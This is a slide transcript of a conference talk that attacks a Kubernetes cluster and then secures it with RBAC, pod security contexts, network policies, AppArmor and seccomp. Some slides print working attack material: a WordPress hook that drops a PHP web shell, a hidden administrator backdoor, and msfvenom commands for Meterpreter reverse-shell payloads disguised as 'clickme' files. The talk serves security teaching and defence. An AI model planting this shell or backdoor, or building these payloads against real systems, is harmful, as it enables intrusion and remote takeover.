Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Attacking a K8s cluster and how defending it

Johann du Toit
October 31, 2019
Technology
0
56

Attacking a K8s cluster and how defending it

Will show how to attack a Kubernetes cluster followed promptly by how to secure your cluster.

Johann du Toit

October 31, 2019
Tweet

More Decks by Johann du Toit

See All by Johann du Toit
RESPECTING THE MICROSERVICE.
johanndutoit
1
44
Why so serious? Using GCP for realtime video context analyzation
johanndutoit
0
71
Progressive Web Apps in 15 Minutes
johanndutoit
0
33
The Machine Learning Intervention
johanndutoit
0
61
Progressive Web Apps
johanndutoit
0
87
Progressive Web Apps
johanndutoit
0
91
Launchpad Start Day 2 - Google Design Sprints
johanndutoit
2
110
Google Design Sprints
johanndutoit
0
76
Cloud Messaging
johanndutoit
0
150

Other Decks in Technology

See All in Technology
0→1開発における技術選定において一番大切なこと
bicstone
1
300
Microsoft Cloudで 開発ライフサイクルを保護する
kkamegawa
0
130
次世代Web認証「パスキー」 / mo-zatsudan-passkey
nkzn
22
13k
ユーザーストーリーのレビューを自動化したみたの
bun913
1
110
「ふりかえりのふりかえり」をふりかえり、実のあるふりかえりにする
naitosatoshi
0
180
Tebiki株式会社 エンジニア採用資料
tebiki
0
4k
Signals Unleashed: The Full Guide
rainerhahnekamp
0
340
Databricks におけるデータエンジニアリング
databricksjapan
0
270
プロデザ! BY リクルート vol.18_リクルートのリサーチ実践組織「リサーチブーストコミュニティ」
recruitengineers
PRO
2
130
Pedestrian-Centric大規模交通安全映像解析向けWoven Traffic Safety (WTS) データセットの紹介
kbuster
0
140
人間の尊厳、幸福、アクセシビリティ / 第116回「WEB TOUCH MEETING」アクセシビリティSP
nulabinc
PRO
2
160
Docker再入門 ~コンテナ・イメージ編~
yoshiyoshiharu
18
7k

Featured

See All Featured
Designing on Purpose - Digital PM Summit 2013
jponch
110
6.4k
Music & Morning Musume
bryan
40
5.5k
Bash Introduction
62gerente
604
210k
Java REST API Framework Comparison - PWX 2021
mraible
PRO
18
6.9k
How STYLIGHT went responsive
nonsquared
92
4.8k
Agile that works and the tools we love
rasmusluckow
323
20k
Six Lessons from altMBA
skipperchong
19
3k
4 Signs Your Business is Dying
shpigford
175
21k
Adopting Sorbet at Scale
ufuk
67
8.6k
Why Our Code Smells
bkeepers
PRO
330
56k
Visualization
eitanlees
135
14k
It's Worth the Effort
3n
180
27k

Transcript

  1. Bust a Kube: Let’s attack a Kubernetes cluster and secure

    it along the way
  2. None
  3. None
  4. None
  5. None
  6. None
  7. None

  8. WHAT ATTACKING DEFENDING

  9. None

  10. WHAT ATTACKING OMG HELP

  11. None
  12. None
  13. None

  14. PODS NODES SERVICES NAMESPACES

  15. POD Pods are the smallest unit of work in kubernetes

    All containers in a pod share IP 10.10.10.1 10.10.10.2 10.10.10.3 10.10.10.4 ip address pod container volume

  16. Node Kubelet Container Runtime: Docker Kube-proxy Kubelet C ontainer Runtim

    e pod #1 pod #2 pod #3

  17. Services A service is a load balancer, create a DNS

    name and ip address that routes traffic to matching labels 10.100.10.1 10.10.10.2 10.10.10.2 service ip address public traffic

  18. Services A service is a load balancer, create a DNS

    name and ip address that routes traffic to matching labels 10.100.10.1 10.10.10.2 10.10.10.2 service ip address public traffic app=hello tier=web app=hello tier=web

  19. Namespaces Logical grouping of resources and the first hint of

    multi-tenancy 10.10.10.2 10.10.10.2 10.10.10.2 10.10.10.2 Marketing Finance
  20. None

  21. > kubectl apply -f app.yaml

  22. None

  23. KUBERNETES API SERVER KUBELET CONTAINER RUNTIME ETCD KUBERNETES DASHBOARD

  24. POD Pods are the smallest unit of work in kubernetes

    All containers in a pod share IP 10.10.10.1 10.10.10.2 10.10.10.3 10.10.10.4 ip address pod container volume Attacks Tend to Start from a POD
  25. None
  26. None

  27. <?php add_action('wp_head', 'WordPress_bscript'); function WordPress_bscript() { file_put_contents( "exec.php", ‘<?php echo

    shell_exec($_REQUEST[“c”]);’ ); } ?>
  28. None
  29. None

  30. <?php add_action('wp_head', 'WordPress_backdoor'); function WordPress_backdoor() { If ($_GET['backdoor'] == 'go')

    { require('wp-includes/registration.php'); If (!username_exists('backdooradmin')) { $user_id = wp_create_user('admin', ‘admin'); $user = new WP_User($user_id); $user->set_role('administrator'); } } } ?>

  31. “Head over to your site and try the function. It’s

    fun, completely safe and can help you in the future if you ever need to have a backdoor entry to your website.”
  32. None
  33. None
  34. None
  35. None
  36. None
  37. None
  38. None

  39. Kali Linux

  40. msfvenom \ -p linux/x64/meterpreter/reverse_tcp \ LHOST=<your ip> \ LPORT=<some port>

    \ -f sh \ -o clickme.sh

  41. msfvenom \ -p linux/x64/meterpreter/reverse_tcp \ LHOST=<your ip> \ LPORT=<some port>

    \ -f elf \ -o clickme

  42. msfvenom \ -p linux/x64/meterpreter/reverse_tcp \ LHOST=<your ip> \ LPORT=<some port>

    \ -f exe \ -o clickme.exe

  43. msfvenom \ -p linux/x64/meterpreter/reverse_tcp \ LHOST=<your ip> \ LPORT=<some port>

    \ -f macho \ -o clickme.macho
  44. None
  45. None
  46. None
  47. None

  48. KUBERNETES API SERVER KUBELET CONTAINER RUNTIME ETCD KUBERNETES DASHBOARD

  49. CONTROL PLANE NETWORKING HOST RUNTIME

  50. CONTROL PLANE NETWORKING HOST RUNTIME

  51. KUBERNETES API SERVER KUBELET CONTAINER RUNTIME ETCD KUBERNETES DASHBOARD

  52. None
  53. None
  54. None
  55. None
  56. None
  57. None

  58. UPGRADE!

  59. None

  60. Role Based Access Control

  61. “RBAC”

  62. None

  63. Role: MarketingAdmin Role: Developer

  64. apiVersion: rbac.authorization.k8s.io/v1 kind: ClusterRole metadata: namespace: marketing name: secret-reader rules:

    - apiGroups: [""] resources: ["secrets"] verbs: ["get", "watch", "list"] Role: MarketingAdmin Role: Developer

  65. apiVersion: rbac.authorization.k8s.io/v1 kind: ClusterRole metadata: namespace: marketing name: secret-reader rules:

    - apiGroups: [""] resources: ["secrets"] verbs: ["get", "watch", "list"] Role: MarketingAdmin Role: Developer RoleBinding

  66. CONTROL PLANE NETWORKING HOST RUNTIME

  67. apiVersion: v1 kind: Pod metadata: name: security-context-demo spec: SecurityContext: runAsUser:

    1000 Step 1: Run as Non Root

  68. apiVersion: v1 kind: Pod metadata: name: security-context-demo spec: SecurityContext: runAsUser:

    1000 readOnlyRootFileSystem: true Step 2: Read Only Filesystem

  69. apiVersion: v1 kind: Pod metadata: name: security-context-demo spec: SecurityContext: runAsUser:

    1000 readOnlyRootFileSystem: true allowPrivilegeEscalation: false Step 3: Prevent Escaping

  70. CONTROL PLANE NETWORKING HOST RUNTIME

  71. apiVersion: networking.k8s.io/v1 kind: NetworkPolicy metadata: name: allow-db-access spec: podSelector: matchLabels:

    tier: database ingress: - from: - podSelector: matchLabels: frontend policyTypes: - Ingress Network Policy
  72. None
  73. None
  74. None

  75. CONTROL PLANE NETWORKING HOST RUNTIME

  76. None
  77. None

  78. Minimal Host OS

  79. None

  80. AppArmor

  81. seccomp

  82. Questions?

  83. • CIS Benchmark - CIS Security • Kube-bench - Aqua

    Security • Kube Auto Analyzer - Rory McCune • KubeAudit - Shopify • Sonobuoy - VMWare / Heptio • KubeATF - Symantec

  84. Security is a not a noun you refer to every

    now and then, it’s a verb and involves constant and specific action

  85. Thanks! [email protected] @signedness